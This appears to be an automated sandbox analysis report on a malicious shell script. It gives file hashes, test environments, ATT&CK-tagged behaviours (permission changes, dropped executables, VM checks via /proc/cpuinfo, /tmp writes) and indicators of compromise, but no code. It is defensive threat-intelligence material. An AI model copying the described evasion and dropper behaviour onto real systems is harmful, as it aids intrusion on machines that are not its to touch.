Analysis
-
max time kernel
39s -
max time network
67s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhf image:debian9-armhf-20240611-en kernel:4.9.0-13-armmp-lpae locale:en-us os:debian-9-armhf system -
submitted
21/10/2024, 01:32
Static task
static1
Behavioral task
behavioral1
Sample
9ee4e47cf1bf8b32e5e125492130c8be69f6f91849ddcf43ca686ff0db7c2e27.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
9ee4e47cf1bf8b32e5e125492130c8be69f6f91849ddcf43ca686ff0db7c2e27.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
9ee4e47cf1bf8b32e5e125492130c8be69f6f91849ddcf43ca686ff0db7c2e27.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
9ee4e47cf1bf8b32e5e125492130c8be69f6f91849ddcf43ca686ff0db7c2e27.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
9ee4e47cf1bf8b32e5e125492130c8be69f6f91849ddcf43ca686ff0db7c2e27.sh
-
Size
10KB
-
MD5
9498e3b84daf1f4fc7db572ea81ea29a
-
SHA1
d111505e7f6138c1c8a076bcc550d27c2af9435d
-
SHA256
9ee4e47cf1bf8b32e5e125492130c8be69f6f91849ddcf43ca686ff0db7c2e27
-
SHA512
59578af0e9e9a321012ffa73db2ca0c348f5dca7652699e0b4af750e484904a86639affdd1e915279db83872d418ac858ceb4d514a3a38006959626b0bd5f66c
-
SSDEEP
192:19JmC837g7T3DywO2SFuuP5AE3m2EyAE3m2xmCjz3j3DyD2SFuuaS:196g7jfY5AE3m2EyAE3m2HPXS
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Executes dropped EXE 28 IoCs
-
Checks CPU configuration 1 TTPs 28 IoCs
Checks CPU information, which can indicate whether the system is a virtual machine.
description: File opened for reading
ioc: /proc/cpuinfo
Process: curl
-
description: File opened for reading
ioc: /proc/sys/crypto/fips_enabled
Process: curl
description: File opened for reading
ioc: /proc/self/auxv
Process: curl
-
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
-
MD5
998368d7c95ea4293237f2320546e440
-
SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
-
SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
-
SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97